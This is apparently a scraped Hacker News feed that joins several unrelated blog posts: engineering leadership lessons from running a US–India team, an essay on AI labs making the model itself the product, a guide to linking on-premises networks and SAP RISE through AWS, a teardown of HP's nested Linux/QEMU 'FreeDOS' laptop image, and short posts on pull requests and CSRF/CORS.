with us today as a guest author.

She is a former Engineering Director at Google and today, she is sharing the lessons learned when she was tasked at Google to set up a whole new global org.

Let’s go straight into it. Chaitali, over to you!

My leadership gave me the green light to hire and grow a team of 30 in Bangalore, India.

Until then, I had only led a team on the US West Coast and I felt excited to learn how to build and manage a team in another country.

I did my homework to prepare for this opportunity → I talked to my coach, got mentorship from people who had done this before, and read recommended books.

A month later, I had to make my own playbook.

No one had done what I was about to attempt: building a new team halfway across the world during a pandemic. Everyone was working from home, and travel was impossible!

Today, I’ll share five lessons for leaders of global organizations.

I really like the Heath Brothers' books, especially The Power of Moments. This book explores how short, intense experiences can surprise us, lift us up, and even change who we are.

I doubted that the usual "assign a buddy" system would help our new hires ramp up while working from home during the pandemic. Especially when their buddy would be in a timezone 12 hours away.

We made a list of starter projects for each quarter, then we paired every new hire in India with an experienced engineer from the US. Working together on projects this way created stronger moments of connection between them.

Another example was creating moments of shared pain. We changed the team meeting time each month → This way, everyone could feel how tough it was to meet late at night or early in the morning.

This built shared pain and empathy, leading to stronger bonds between both teams!

A great team builds culture through repetition.

As a leader, you need to know what ideas you want as the foundation of your culture, then you need to find many everyday moments to say or show those ideas.

I realized early that to build an inclusive culture in my organization, we needed to change some practices from optional to necessary. Hand raises in video calls and notes shared after meetings were two practices.

For a year or more, I asked for hand raises before speaking during meetings and I also requested written notes after each meeting.

Another investment I made was doing frequent small group coffee chats.

Keeping the group small → no more than 20 people, was key to fostering open dialogue. We rotated the timings for these as well to give everyone in the US and India equal opportunity to join. These chats were another channel to cultivate team culture.

I began using “our global team” for the whole organization and for specific areas, I'd say “the US team” or “the India team”. This was instead of “the remote team” or “the offshore team”.

Others caught on to this lingo, and it became part of our team culture over time!

The big time difference of about 12 hours and the unusual situation where no travel was possible made things tricky!

It forced me to repurpose many of my old leadership tools.

I have always been a delegation practitioner, but in this situation, I had to up that practice 10x! L. David Marquet’s Turn the Ship Around immensely helped me here.

I talked about the Leader-Leader model and the “I intend to” approach with my leadership team and we began using it, especially for roundtrip decisions between India and the US.

We invested time discussing the mechanics of implicit consent and explicit dissent and I knew we had adopted this model when I began waking up to messages like:

  • “I intend to deploy this release during my day. Please leave a message if you disagree.”

  • “I intend to finish hiring this senior engineer on <date> IST. Let me know if I shouldn’t.”

I could ignore most of these messages, but they also let me step in if I felt strongly.

Another old tool that didn’t work during the pandemic was the “in-person leadership summit."

My mentors suggested I bring my India and US leads together right after forming the new team, so we could share ideas and build connections.

Without travel, we could only have a virtual “golden hour” video call in the early morning or late evening of either timezone.

I turned to Priya Parker’s The Art of Gathering to design meaningful virtual meetings.

We invested in short, meaningful activities to make the most of our limited time and I made a conscious effort to stay away from activities that would feel awkward or fake to the team.

We formed stronger connections through these meetings than from a big summit.

A key leadership principle for me is what I call “actionable empathy" → you won’t understand your team’s struggles until you experience them yourself.

There was a power gap between my US and India teams.

My US leads had easier access to me and other stakeholders because of the time zone advantage and with no travel possible, it was up to me to apply actionable empathy in this situation.

One week, I bought room-darkening curtains for our guest bedroom and I marked my calendar as out-of-office and took a virtual trip to India.

I stayed up from 8 pm PT to 4 am PT doing meetings and 1:1s with my India team for most of that week.

Chai, samosas, and some Indian snacks helped make it feel more real!

My virtual trip strengthened my ties with the India team and it also changed how both parts of my organization interacted.

Another reason to pick that travel week was the virtual conference by Grace Hopper India (GHC). I got to attend a few of their sessions, which introduced me to some amazing women leaders.

That enabled me to make many great hires, including a director later down the line!

We may want to think our performance reviews are fair, but they often reflect human biases. Biases in performance evaluations disproportionately impact those further away from the leadership epicenter and this happens due to availability bias.

For example, we were reviewing candidates for Staff Engineer promotions and everyone recognized one candidate’s work.

This person gave several tech talks and often connected with senior leaders and the other candidate did not seem to be very visible. They had fewer tech talks, and most senior leaders barely remembered speaking with them.

I asked the group if visibility was a criterion in our job ladder → It wasn’t. This led us to discuss ladder attributes. We discovered that both candidates had strong technical contributions and they also mentored and led junior engineers. Plus, each was an expert in their field!

The key difference between both candidates? Location! One was located on the US West Coast, and the other was located in India.

Once we started looking closely, we realized something important. Our India-based Staff Engineer candidate gave three tech talks at 11 PM their time. That’s pretty impressive!

If you run a global organization, act now to cut biases in performance reviews and promotions. This helps ensure that everyone feels valued!

I learned how crucial it is to adapt your leadership style and I learned to focus on building connections and showing real empathy.

My journey taught me how to build and lead larger organizations in many countries and the lessons I mentioned are scalable and suitable even for hybrid work.

Gregor here again!

To learn further, Chaitali also created a Notion template, where you can find activities that help virtual teams to increase connection.

And she has kindly given this template for free to Engineering Leadership readers for the next 30 days. Use the code: 6V5DRXI at the checkout or click the button below:

10 Meaningful Virtual Team Activities

Additionally, you can get this template and similar others for free by becoming a paid subscriber to her newsletter

.

Special thanks to

for sharing her insights and experience.

Make sure to follow her on LinkedIn and also check out her newsletter

, where she shares similar learnings from her 15+ career in the engineering industry.

We are not over yet!

My friend

, who has also been a guest author on the newsletter to the article From Engineer to Principal Solutions Architect at AWS with Prasad Rao, has just launched his online course!

If you are looking to get better in Big Tech interviews, this might be a great course for you. He also gave a 10% discount to the Engineering Leadership readers, so use the code EL10 at the checkout to redeem it.

I want to check out the course!

Liked this article? Make sure to 💙 click the like button.

Feedback or addition? Make sure to 💬 comment.

Know someone that would find this helpful? Make sure to 🔁 share this post.

  • Join the Cohort course Senior Engineer to Lead: Grow and thrive in the role here.

  • Interested in sponsoring this newsletter? Check the sponsorship options here.

  • Take a look at the cool swag in the Engineering Leadership Store here.

  • Want to work with me? You can see all the options here.

You can find me on LinkedIn, X, Bluesky, Instagram or Threads.

If you wish to make a request on particular topic you would like to read, you can send me an email to info@gregorojstersek.com.

This newsletter is funded by paid subscriptions from readers like yourself.

If you aren’t already, consider becoming a paid subscriber to receive the full experience!

Check the benefits of the paid plan

You are more than welcome to find whatever interests you here and try it out in your particular case. Let me know how it went! Topics are normally about all things engineering related, leadership, management, developing scalable products, building teams etc.

Discussion about this post

]]>
https://newsletter.eng-leadership.com/p/5-lessons-learned-setting-up-a-global hacker-news-small-sites-43232333 Sun, 02 Mar 2025 16:54:29 GMT
<![CDATA[The Model Is the Product]]> thread link) | @pongogogo
March 2, 2025 | https://vintagedata.org/blog/posts/model-is-the-product | archive.org

There were a lot of speculation over the past years about what the next cycle of AI development could be. Agents? Reasoners? Actual multimodality?

I think it's time to call it: the model is the product.

All current factors in research and market development push in this direction.

  • Generalist scaling is stalling. This was the whole message behind the release of GPT-4.5: capacities are growing linearly while compute costs are on a geometric curve. Even with all the efficiency gains in training and infrastructure of the past two years, OpenAI can't deploy this giant model with a remotely affordable pricing.
  • Opinionated training is working much better than expected. The combination of reinforcement learning and reasoning means that models are suddenly learning tasks. It's not machine learning, it's not base model either, it's a secret third thing. It's even tiny models getting suddenly scary good at math. It's coding model no longer just generating code but managing an entire code base by themselves. It's Claude playing Pokemon with very poor contextual information and no dedicated training.
  • Inference cost are in free fall. The recent optimizations from DeepSeek means that all the available GPUs could cover a demand of 10k tokens per day from a frontier model for… the entire earth population. There is nowhere this level of demand. The economics of selling tokens does not work anymore for model providers: they have to move higher up in the value chain.

This is also an uncomfortable direction. All investors have been betting on the application layer. In the next stage of AI evolution, the application layer is likely to be the first to be automated and disrupted.

Shapes of models to come.

Over the past weeks, we have seen two prime example of this new generation of models as a product: OpenAI's DeepResearch and Claude Sonnet 3.7.

I've read a lot of misunderstandings about DeepResearch, which isn't helped by the multiplication of open and closed clones. OpenAI has not built a wrapper on top of O3. They have trained an entirely new model, able to perform search internally, without any external calls, prompts or orchestration:

The model learned the core browsing capabilities (searching, clicking, scrolling, interpreting files) (…) and how to reason to synthetize a large number of websites to find specific pieces of information or write comprehensive reports through reinforcement learning training on these browsing tasks.

DeepResearch is not a standard LLM, nor a standard chatbot. It's a new form of research language model, explicitly designed to perform search tasks end to end. The difference is immediately striking to everyone using it seriously: the model generate lengthy reports with consistent structure and underlying source analysis process. In comparison as Hanchung Lee underlined all the other DeepSearch, including the Perplexity and Google variant, are just your usual models with a few twists:

Google’s Gemini and Perplexity’s chat assistants also offer “Deep Research” features, but neither has published any literature on how they optimized their models or systems for the task or any substaintial quantitative evaluations (…) We will make an assumption that the fine-tuning work done is non-substantial.

Anthropic has been laying their current vision ever clearer. In December, they introduced a controversial but, to my mind, correct definition of agent models. Similarly to DeepSearch, an agent has to perform the targeted tasks internally: they "dynamically direct their own processes and tool usage, maintaining control over how they accomplish tasks".

What most agent startups are currently building is not agents, it's workflows, that is "systems where LLMs and tools are orchestrated through predefined code paths." Workflows may still bring some value, especially for vertical adaptations. Yet, to anyone currently working in the big labs it's strikingly obvious that all major progress in autonomous systems will be through redesigning the models in the first place.

We had a very concrete demonstration of this with the release of Claude 3.7, a model primarily trained with complex code use cases in mind. All the workflow adaptation like Devin had a major boost on SWE benchmarks.

To give it another example done at a much smaller scale: at Pleias we're currently working on automating RAG. Current RAG systems are a lot of interconnected yet brittle workflows: routing, chunking reranking, query interpretation, query expansion, source contextualization, search engineering. With the evolving training tech stack, there is a real potential to bundle all theses processes in two separate yet interconnected models, one for data preparation and the other for search/retrieval/report generation. This requires an elaborated synthetic pipeline and entirely new reward functions for reinforcement learning. Actual training, actual research.

What all this all means in practice: displacing complexity. Training anticipates a wide range of actions and edge cases, so that deployment becomes much more simple. But in this process most of the value is now created and, likely in the end, captured by the model trainer. In short, what Claude aims to disrupt and replace the current workflows like this basic "agent" system from llama index:

Llama Index Basic Agent

With this:

Claude Agent

Training or being trained on.

To reassert: the big labs are not advancing with an hidden agenda. While they can be opaque at time, they laying it all in the open: they will bundle, they will go up the application layer and they will attempt to capture most of the value there. And the commercial consequences are quite clear. Naveen Rao, the Gen AI VP of Databricks, phrased it quite well:

all closed AI model providers will stop selling APIs in the next 2-3 years. Only open models will be available via APIs (…) Closed model providers are trying to build non-commodity capabilities and they need great UIs to deliver those. It's not just a model anymore, but an app with a UI for a purpose.

So what is happening right now is just a lot of denial. The honeymoon period between model providers and wrappers is over. Things could evolve in both direction:

  • Claude Code and DeepSearch are early technical and product experiments in this direction. You will notice that DeepSearch is not available through an API, only used to create value for the premium subscriptions. Claude Code is a minimalistic terminal integration. Weirdly enough, while Claude 3.7 works perfectly in Claude Code, Cursor struggles with it and I've already seen several high end users cancelling their subscriptions as a result. Actual LLM agents doesn't care about pre-existing workflows: they replace it.
  • The most high profile wrapper are now scrambling to become hybrid AI training companies. They do have some training capacities, though very little advertised. One of Cursor main assets is their small autocompletion model. WindSurf has their internal cheap code model, Codium. Perplexity always relied on home classifiers for routing and recently pivoted to train their own DeepSeek variant for search purposes.
  • For smaller wrappers, not much will change, except likely increased reliance on agnostic inference providers if the big labs entirely let go of this market. I do also expect to see much more focus on UI which is still dramatically underestimated, as even more generalist models are likely to bundle common deployment takss, especially for RAG.

In short the dilemma for most successful wrappers is simple: training or being trained on. What they are doing right now is both free market research for the big labs but, even, as all outputs is ultimately generated through model providers, free data design and generation.

What will happen afterwards is anyone guess. Successful wrappers do have the advantage of knowing their vertical well and accumiulating a lot of precious user feedbacks. Yet, in my experience, it's easier to go down from the model to application layers than building an entirely new training capacities from scratch. Wrappers may not have been helped by their investors either. From what I overheard, there is such a negative polarization against training, they almost have to hide what is going to be their most critical value: neither cursor small nor codium are properly documented at this moment.

Reinforcement learning was not priced in.

This brings me to the actual painful part: currently all AI investments are correlated. Funds are operating under the following assumptions:

  • The real value lay exclusively in an application layer independent from the model layer that is best positioned to disrupt existing market.
  • Model providers will only sell tokens at an ever lowering price, making wrappers in turn more profitable.
  • Close models wrapping will satisfy all the existing demands, even in regulated sectors with long lasting concerns over external dependencies.
  • Building any training capacity is just a waste of time. This does not include only pre-training but all forms of training.

I'm afraid this increasingly look like an adventurous bet and an actual market failure to accurately price the latest technical developments, especially in RL. In the current economic ecosystem, venture funds are meant to find uncorrelated investments. They will not beat S&P500 but that's not what larger institutional investors are looking for: they want to bundle risks, ensure that in a bad year at least some things will work out. Model training is like a textbook perfect example for this: lots of potential for disruption in a context where most western economies are on course for a recession. And yet model trainers can't raise, or at least not in the usual way. Prime Intellect is one of the few new western ai training companies that has a clear potential to become a frontier lab. Yet, despite their achievements including the training of the first decentralized LLM, they struggled to raise more than your usual wrapper.

Beyond that, aside from the big lab, the current training ecosystem is very tiny. You can count all theses companies on your hands: Prime Intellect, Moondream, Arcee, Nous, Pleias, Jina, the HuggingFace pretraining team (actually tiny)… Along with a few more academic actors (Allen AI, Eleuther…) they build and support most of the current open infrastructure for training. In Europe, I know that at least 7-8 LLM projects will integrate the Common Corpus and some of the pretraining tools we developed at Pleias — and the rest will be fineweb, and likely post-training instruction sets from Nous or Arcee.

There is something deeply wrong in the current funding environment. Even OpenAI senses it now. Lately, there was some felt irritation at the lack of "vertical RL" in the current Silicon Valley startup landscape. I believe the message comes straight from Sam Altman and will likely result in some adjustment in the next YC batch but pinpoint to a larger shift: soon the big labs select partners won't be API customers but associated contractors involved in the earlier training stage.

If the model is the product, you cannot necessarily build it alone. Search and code are easy low hanging fruits: major use cases for two years, the market is nearly mature and you can ship a new cursor in a few months. Now many of the most lucrative AI uses cases in the future are not at this advanced stage of development — typically, think about all these rule based system that still rule most of the world economy… Small dedicated teams with a cross-expertise and a high level of focus may be best positioned to tackle this— eventually becoming potential acquihire once the initial ground work is done. We could see the same pipeline in the UI side. Some preferred partner, getting exclusive API access to close specialized models, provided they get on the road for business acquisition.

I haven't mentioned DeepSeek, nor Chinese labs so far. Simply because DeepSeek is already one step further: not model as a product, but as a universal infrastructure layer. Like OpenAI and Anthropic, Lian Wenfeng lays his plans in the open:

We believe that the current stage is an explosion of technological innovation, not an explosion of applications (…) If a complete upstream and downstream industrial ecosystem is formed, then there is no need for us to make applications ourselves. Of course, there is no obstacle for us to make applications if needed, but research and technological innovation will always be our first priority.

At this stage, working only on applications is like "fighting the next wars with last war generals". I'm afraid we're at the point where many in the west are not even aware the last war is over.

]]>
https://vintagedata.org/blog/posts/model-is-the-product hacker-news-small-sites-43232270 Sun, 02 Mar 2025 16:48:43 GMT
<![CDATA[Interconnecting SAP, On-Premises and AWS]]> thread link) | @lockedinspace
March 2, 2025 | https://lockedinspace.com/posts/003.html | archive.org

This post is handwritten, no LLM's were used to write and mock this up.
Lately, I have been working on projects that involve connecting on-premises data centers with SAP RISE/ECS.
Although there are multiple approaches to achieving this, if your business case allows it, introducing a third player into the equation (Using an AWS account as a router mimicking a hub-and-spoke model [1]) can provide the following benefits:

However, it can also introduce challenges, such as: Keep in mind that this topology has been discussed by AWS previously [2]. Having said this, let me deepen into the stated points above.

[+] Govern the network communication, making it easier to solve network problems.

Having control of the network gives you more flexibility when diagnosing errors. Once the communication between your on-premises infrastructure and AWS is established and proven functional, you can focus on troubleshooting the other parts. By narrowing down the issue in this way, you simplify the resolution process.


[+] Seamlessly introduce new cloud services (e.g., RDS, Lambda, etc.) empowering your business outcomes.

Introducing new cloud services into your on-premises workspace becomes easier when you already have part of your business operating in the cloud. This setup allows you to reduce costs associated with legacy servers and take advantage of a pay-as-you-go model, which may be more cost-effective for your organization.

From my personal experience, I have observed clients implement Amazon S3 and significantly reduce costs for data that required a considerable retention period. While the specifics can vary from business to business, all organizations can benefit from moving some of their workloads into the cloud, ultimately leading to improved outcomes.


[+] Easily route or introduce other third-party services without disruption.

Similiar to the point above, if you have more than one data center (e.g. country-based data centers), this topology model makes it easier to include any new components. Enabling you a much more faster time-to-market.


[-] Adding a new component to the network architecture requires skilled personnel to maintain, update, and manage it effectively.

That is the main purpose of this tech post, building this topology effectively and updating it as changes come, requires you to have skilled personnel. This can be your starting point or can help you decide if you want to go with this approach.

Feel free to email me: [g5o] at [lockedinspace] dot [com]
if you have more technical questions. Will answer as soon as possible.

Having said this, let's begin the technical approach to make this work

Putting things in place

Having a diagram helps understanding where each piece goes, for this topology we will have three actors. Agents in the topology
Each square in the diagram represents one component in the topology.
  • For on-premises, the range depicted (192.168.1.0/24) refers to the data center CIDR block.
  • AWS services are contained in a Virtual Private Cloud (VPC [3]), and the range 10.1.0.0/16 refers to our account VPC.
  • For SAP's side, we will provide the range through a formulary, the provided range must not collide with our VPC's range.

  • SAP has various methods of establishing the connection, for this tech post, we will stick with the Transit Gateway [4] method.
    Using AWS VPN Site-to-Site [5] will enable us to establish a connection between our data-center and AWS.

    The resulting diagram would be: AWS Services in the topology Let's separate the diagram in two parts, so we can explain in more details each section.

    On-Premises to AWS (and vice-versa)
    This part involves in allowing your On-Premises data center to communicate with your AWS account. In the example depicted above, this is done through a VPN Site-to-Site [6] tunnel. Before establishing the connection, keep in mind the following prerequisites:
      Ensure that your On-Premises network and your AWS VPC CIDR blocks do not overlap.
      Ensure your router or firewall supports IPSec VPN. That's cause AWS uses that tunneling protocols for the VPN Site-to-Site service.
    Once the prerequisites are met, you will need to create a Transit Gateway (TGW) [7] in your AWS Account and attach it to your VPC.
    Next, define a Customer Gateway (CGW) [8] in AWS representing your on-premises endpoint.
    VPN Connection: Once the TGW and CGW are configured, establish a VPN connection between them. You can choose static or dynamic (BGP) routing.

    A high level overview of how a connection between your On-Premises and AWS looks like:
    AWS Services in the topology
    Keep in mind that in this example we are creating a VPN tunnel, which essentially travels the public internet through an encrypted connection. If your busienss case does not allow this you can use a Direct Connection.
    Also note that we are using a TGW (Transit Gateway) instead of a VGW (Virtual Private Gateway) on the AWS side, going for this approach makes the infrastructure much scalable, enabling you to easely connect multiple accounts VPCs into the equation.

    Once everthing is set up, you can test the reachability with a simple test. Issue an ICMP request from one of your On-Premises servers and ping an EC2 instance in AWS.
    If the Security Group in AWS allows inbound connections from the 192.168.1.0/24 CIDR range (same for On-Premises firewall), servers from both ends will see each other.

    AWS to SAP RISE / ECS (and vice-versa)
    As for 2024, you will need to share with SAP some details through an excel file. SAP will demand the following AWS information:
      Customer VPC ID: Your AWS account VPC ID (e.g. vpc-049219323832386)
      Customer Customer Transit Gateway ID: Your TGW ID (e.g. tgw-0622323832386ca2)
      Customer AWS Account ID: The account ID where your VPC and TGW are hosted (e.g. 1158239581382659)
      Customer Network IP ranges: Your AWS VPC CIDR Range (e.g. 10.1.0.0/16)

    They will also demand some information for your VPN setup:
      Customer VPN Gateway Details: The software used in your On-Premises (e.g. Sophos XG UTM (IPsec)
      Customer VPN Gateway Inter for facing public IP Address: Your public On-Premises IP address (e.g. 195.125.24.13/32)
      Type of Routing: Can be static or dynamic (e.g. static)
      BGP ASN for Dynamic Routing: Blank in this case cause we are using static routing
      ASN for the AWS side of the BGP: The default ASN (e.g. 64512)
      Customer On-Premises Network IP ranges: Your On-Premises IP range (e.g. 192.168.1.0/24)

    Some important notes:
      You will need to provide to SAP a non-overlapping /22 or higher CIDR range reserved exclusively for them. (e.g. 10.15.0.0/22), this /22 range will be used for SAP in order to build their SAP infrastructure services. Visit https://cidrclash.com to check if both CIDR ranges collide.
      Feel free to ask SAP IT team if any concerns arise during the formulary setup, issues are quite common, but they will gladly support you if any mishap occurs.
    Next steps once provided details are valid
    You will need to share your TGW using Resource Access Manager (RAM) [9] to the provided SAP HEC AWS account.

    Once SAP accepts your share request, they will modify the TGW route table to propagate their infra CIDR (10.15.0.0/22 ) with yours (On-Premises and AWS, 192.168.1.0/24 and 10.1.0.0/16 CIDR's).
    After they verify everything, you will allow SAP's CIDR range (10.15.0.0/22) into your firewalls (SG, and Sophos router).

    With that, you should be able to query SAP nameservers from both your On-Premises and AWS servers.

    Conclusion

    Analyze if your business can take advantage of the cloud, if that's the case, you can kill two birds with one stone. Gaining the governance of the network communications and take foot into the cloud and progessively migrate your workloads there.

    This will enable your organization to leverage on plenty AWS services such as Lambda for your day-to-day operations and boost your On-Premises workforce.

    As always, if you feel stuck or need some guidance on how to tackle this scenario (or similar), feel free to e-mail me with your concerns.

    References

    date: 2024-10-05
    author: "[g5o] at [lockedinspace] dot [com] "
            
    ]]>
    https://lockedinspace.com/posts/003.html hacker-news-small-sites-43232058 Sun, 02 Mar 2025 16:28:54 GMT
    <![CDATA[The weird Hewlett Packard FreeDOS option]]> thread link) | @wibbily
    March 2, 2025 | https://blog.tmm.cx/2022/05/15/the-very-weird-hewlett-packard-freedos-option/ | archive.org

    The very weird Hewlett Packard FreeDOS option

    In this installment: some strange things I discovered when purchasing a FreeDOS laptop from Hewlett Packard. I suspect that the audience for this will be somewhat limited but I had fun exploring this. Perhaps you, dear reader, will find a chuckle in here too.

    Some background: I recently purchased a HP ZBook 17.8 G8 as I run Fedora Linux I decided to have a little fun with the OS selection and picked the FreeDOS option (Other options include Ubuntu, and various flavors of Windows 11).

    And! Sure enough: After unpacking and plugging in the laptop I was greeted by the following.

    The out of the box FreeDOS experience of the HP Zbook Fury 17.8 G8

    Apart from this appearing to be a very old version of FreeDOS the primary thing I noticed was how long it took to get to this point. I was also fairly sure that I saw something flash during boot which looked suspiciously like some Linux kernel boot messages. I saved whatever was on the hard drive from the factory to some image files before installing Fedora Workstation.

    From the factory HP included three partitions:

    None of this appears terribly DOS-sy. It appears that HP is actually shipping a Linux and then running DOS in a VM. Let’s try to boot this whole thing in a VM and see what we get.

    As the eagle eyes of you might have noticed the “HP Documentation” link appears to start some kind of PDF reader. The document at the end starts with the following:

    Very limited indeed

    It seems that although this computer did indeed not ship with a Windows ® operating system it shipped with at a minimum two others. I say at a minimum because there’s actually THREE operating systems shipped on this machine!

    What was in the factory image

    Now that we’ve seen what the factory image does let’s have a look at how it does it. First of all: What are we booting?

    # cat /etc/os-release 
    PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
    NAME="Debian GNU/Linux"
    VERSION_ID="9"
    VERSION="9 (stretch)"
    ID=debian
    HOME_URL="https://www.debian.org/"
    SUPPORT_URL="https://www.debian.org/support"
    BUG_REPORT_URL="https://bugs.debian.org/"

    So it appears we got a Debian GNU/Linux 9 installation on the hard drive. After some poking around I have found the following:

    • The laptops is set to UEFI boot, which boots a pretty standard GRUB
    • Debian gets booted with KMS disabled, as well as all DRM drivers.
    • Once the system is booted Gnome Display Manager starts
    • GDM will automatically login the root user and start the /root/.xsession
    • The XSession will start an XFCE terminal and executes Qemu on an image file in /home/aos/qemu

    The actual /root/.xsession is copied below:

    #!/bin/bash
    
    xfce4-terminal --zoom=-7 --geometry=1x1 --fullscreen --hide-toolbar --hide-menubar --hide-scrollbar --hide-borders -e "bash -c 'sleep 2 && xdotool search --name QEMU windowsize 100% 100% && xdotool search --name QEMU windowsize 100% 100%  && xdotool search --name QEMU windowsize 100% 100%  && xdotool search --name QEMU windowsize 100% 100% &  qemu-system-x86_64 -smp cores=8 --enable-kvm -m 2048 -vga cirrus -hda /home/aos/qemu/freedos.img -usbdevice tablet -usb -device usb-host,hostbus=2,hostaddr=1 -monitor telnet:127.0.0.1:9378,server,nowait && poweroff -f  ; exec bash'" >/dev/null 2>&1
    poweroff -f
    #xfce4-terminal --fullscreen --hide-toolbar --hide-menubar --hide-scrollbar --hide-borders

    This is an… interesting approach, probably necessary because no window manager is started in the X session. Xdotool is used in this case to repeatedly try to resize the Qemu window until it covers the entire X session. Apparently after testing just doing it three times was “good enough”

    What this basically does is the following:

    • Start an XFCE terminal hiding all of its UI
    • Start a 2 second timer and wait
    • At the same time start a Qemu virtual machine
    • Once the 2 second time is up search for the Qemu window and try to resize it to fill the screen. Do this three times in case one of them fails?
    • Once Qemu exits shutdown the computer

    More questions than answers

    At this point it is worth mentioning that the FreeDOS/HP Documentation menu is running inside the Qemu VM. The “real” bootloader (grub) does not have its menus enabled and just always boots straight into the Debian 9 installation on the hard drives.

    What is this “HP Documentation” thing then. Did they package a DOS PDF reader? Well, only one way to find out. We have to go ONE LEVEL DEEPER (into /home/aos/qemu/freedos.img)

    # fdisk -l freedos.img 
    Disk freedos.img: 2 GiB, 2150400000 bytes, 4200000 sectors
    Units: sectors of 1 * 512 = 512 bytes
    Sector size (logical/physical): 512 bytes / 512 bytes
    I/O size (minimum/optimal): 512 bytes / 512 bytes
    Disklabel type: dos
    Disk identifier: 0x00000000
    
    Device       Boot   Start     End Sectors  Size Id Type
    freedos.img1         2048 2007039 2004992  979M  b W95 FAT32
    freedos.img2 *    2007040 4192255 2185216    1G  b W95 FAT32

    So it seems we have two partitions… Wait is there a C: and a D: drive in here?

    Remember how I said there’s three operating systems on this machine? I lied: There’s four. The freedos.img file actually contains TWO separate FreeDOS installations however both are the exact same version.

    Imageception: What is in freedos.img

    After extracting the contents of the two FAT32 partitions I found the following:

    • The image contains an installation of syslinux
    • Boot option one is a chain boot into FreeDOS on the first partition
    • Boot option two boots another Linux from the second partition
    label dos
            menu label ^FreeDOS
            menu default
            com32 chain.c32
            append hd0 1
    
    label live
            menu label ^HP Documents
            kernel /live/vmlinuz
            append initrd=/live/initrd.img boot=live config homepage=file:///hpdocs/platform_guides/languages/index.html nonetworking nopersistent quickreboot nomodeset radeon.modeset=0 nouveau.modeset=0 i915.modeset=0 username=webc video=vesa apm=off novtswitch pnpbios=off acpi=off nomce loglevel=3 libata.force=noncq quiet splash noroot novtswitch

    This Linux appears to live in /live and it has a squashfs root filesystem. So… let’s have a poke at that too. This file is located on partition two in /live/filesystem.squashfs no points for originality there.

    Most of the files in this filesystem seem to date back several decades so no convenient /etc/os-release file for us there. But we DO get an /etc/debian_version, there is no ubuntu_version so it appears that this is in fact Debian based.

    # cat debian_version 
    6.0.3

    It appears we have a 32bit Debian 6.0.3 installation. Judging by the release notes this release is from October 8th, 2011.

    Down, down, down we go

    It appears we have another image to dissect. This time the Debian 6.0.3 installation which shows us that helpful PDF telling us the PC is useless in its factory configuration. After looking through the various startup options the image appears to be doing the following:

    • We boot Debian more-or-less like normal, disabling all hardware accelerated video outputs and switching to the VESA driver.
    • There’s an /etc/rc.local file which attempts to locate a partition labeled HPDOCS and mounts it on /hpdocs. If it can’t locate this it mounts whatever happens to be /dev/sda1 on /hpdocs
    • Start a service called “Webconverger”, this is apparently an old style “turn Debian into a web kiosk” project. (Archive.org link)

    Webconverger does a couple more things

    • Configures an X server
    • Sets iceweasel‘s homepage to the value from the pxelinux configuration above
    • Set audio volume control to 100% (auch)
    • Sleep 10 seconds, then switch between virtual terminal 1 and 2

    Summary

    When ordering a HP machine with FreeDOS what you are getting is the following:

    • A Linux installation on the “bare metal” which boots a VM
    • This VM boots either an old version of FreeDOS or
    • An old version of Linux in a kiosk mode

    Conclusions, such as they are

    It doesn’t seem likely that the FreeDOS image as provided is actually good for anything. I didn’t really expect it to be but I was kind of hoping to install Duke Nukem 3D on “bare hardware” on a factory OS.

    Based on the dates and how this is put together I assume that the contents of freedos.img are what used to be shipped on the real hardware. When NVME drives and other modern hardware features became the norm I suspect that this just didn’t work any longer. Instead of updating the image a VM layer was put in and the old factory image simply got included in the new one. It’s not a terrible solution really.

    Someone at HP really needs to learn about what Window managers are for on X11, however, they could have saved themselves a lot of headaches. If anyone wants to build a system like this send me an email, I’m sure we can work something out 🙂

    To round out this review below you will find some videos of the various boot options that shipped with the PC.

    Booting the original image into DOS
    Booting the original image into the Documentation page
    ]]>
    https://blog.tmm.cx/2022/05/15/the-very-weird-hewlett-packard-freedos-option/ hacker-news-small-sites-43232057 Sun, 02 Mar 2025 16:28:38 GMT
    <![CDATA[At 34 for v5.34: Modern Perl features for Perl's birthday]]> thread link) | @fanf2
    March 2, 2025 | https://phoenixtrap.com/2021/12/21/34-at-34-for-v5-34-modern-perl-features-for-perls-birthday/ | archive.org

    Unable to retrieve article]]>
    https://phoenixtrap.com/2021/12/21/34-at-34-for-v5-34-modern-perl-features-for-perls-birthday/ hacker-news-small-sites-43231529 Sun, 02 Mar 2025 15:42:03 GMT
    <![CDATA[Never Wait to Open a Pull Request]]> thread link) | @chilipepperhott
    March 2, 2025 | https://elijahpotter.dev/articles/never_wait | archive.org

    Preface: This post is specif­i­cally about Pull Requests for Harper. Read the con­trib­u­tor guide­lines for a pro­ject be­fore open­ing a PR.

    I get it. Open­ing a pull re­quest is an in­tim­i­dat­ing propo­si­tion.

    It is non-triv­ial to put your blood, sweat, and (let’s be hon­est) tears into code and put that onto the in­ter­net for the world to see. I re­mem­ber my first pull-re­quest: it was­n’t pretty ei­ther.

    But I want to high­light a cou­ple rea­sons why I want po­ten­tial con­trib­u­tors to open their pull re­quests as early as pos­si­ble.

    Drafts Reduce Duplicate Work

    When a con­trib­u­tor to a pro­ject is as­sess­ing the vi­a­bil­ity or use­ful­ness of some work they’re prepar­ing to do, most look at ex­ist­ing Pull Requests first. Even if you’re still work­ing on the patch, it’s a great idea to open a draft” PR so no one starts work that could go to waste.

    Further, if you have a draft open whose CI is fail­ing, a main­tainer may see it and fix what­ever the prob­lem may be. I find my­self fre­quently brows­ing Harper’s Pull Requests look­ing for fail­ing builds, since I’m of­ten the best equipped to find the is­sue.

    It Helps With Debugging

    I try to make my­self avail­able to con­trib­u­tors in case they have any ques­tions re­gard­ing the ar­chi­tec­ture of Harper. I’m also game to help de­bug their code, partly be­cause I am of the opin­ion that de­bug­ging is a skill which is best learned by ex­am­ple.

    But it is hard for me to de­bug code if I don’t have it. If a draft PR has been opened, I can usu­ally see the prob­lem with­out even cloning the code, since our CI is so com­pre­hen­sive.

    Conclusion

    So please don’t wait; open that PR. I am thrilled each time I see a name I don’t rec­og­nize on a GitHub no­ti­fi­ca­tion.

    ]]>
    https://elijahpotter.dev/articles/never_wait hacker-news-small-sites-43231487 Sun, 02 Mar 2025 15:38:51 GMT
    <![CDATA[Why do we have both CSRF protection and CORS?]]> thread link) | @smagin
    March 2, 2025 | https://smagin.fyi/posts/cross-site-requests/ | archive.org

    Hello, Internet. I thought about cross-site requests and realised we have both CSRF protection and CORS and it doesn’t make sense from the first glance. It does generally, but I need a thousand words to make it so.

